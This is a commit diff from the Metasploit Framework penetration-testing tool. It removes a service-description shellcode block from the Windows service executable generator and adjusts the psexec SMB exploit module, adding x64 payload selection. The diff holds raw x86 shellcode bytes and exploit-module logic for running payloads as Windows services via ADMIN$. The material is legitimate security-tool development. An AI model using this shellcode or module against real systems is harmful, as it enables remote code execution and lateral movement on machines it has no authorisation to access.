SERVICE_DESCRIPTION doesn't concern this PR

2014-01-06 22:00:18 +01:00 · 2014-01-06 22:00:18 +01:00 · 808f87d213
parent bb4e9e2d4d
commit 808f87d213
2 changed files with 6 additions and 19 deletions
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -539,20 +539,6 @@ require 'msf/core/exe/segment_injector'
        "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
        "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"

-      code_service_description = ""
-
-      if opts[:servicedescription]
-        pushed_service_description = string_to_pushes(opts[:servicedescription])
-
-        code_service_description = 
-          "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" +
-          "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" +
-          "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" +
-           pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" +
-          "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" +
-          "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5"
-      end
-
      precode_size = 0x42
      shellcode_code_offset = code_service_stopped.length + precode_size

@ -575,8 +561,7 @@ require 'msf/core/exe/segment_injector'
         [hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
        "\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
-        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" +
-         code_service_description+"\x31\xFF\x6A" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
        "\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
        "\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
        "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -83,8 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
        OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
-        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
      ], self.class)
  end

@ -155,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
      # Disconnect from the ADMIN$
      simple.disconnect("ADMIN$")
    else
-      servicename = datastore['SERVICE_NAME'] || "#{rand_text_alpha(8)}"
+      servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
      servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
      displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)

@ -180,6 +179,9 @@ class Metasploit3 < Msf::Exploit::Remote
      end
      exe = ''
      opts = { :servicename => servicename }
+      if (datastore['PAYLOAD'].include? 'x64')
+        opts.merge!({ :arch => ARCH_X64 })
+      end
      exe = generate_payload_exe_service(opts)

      fd << exe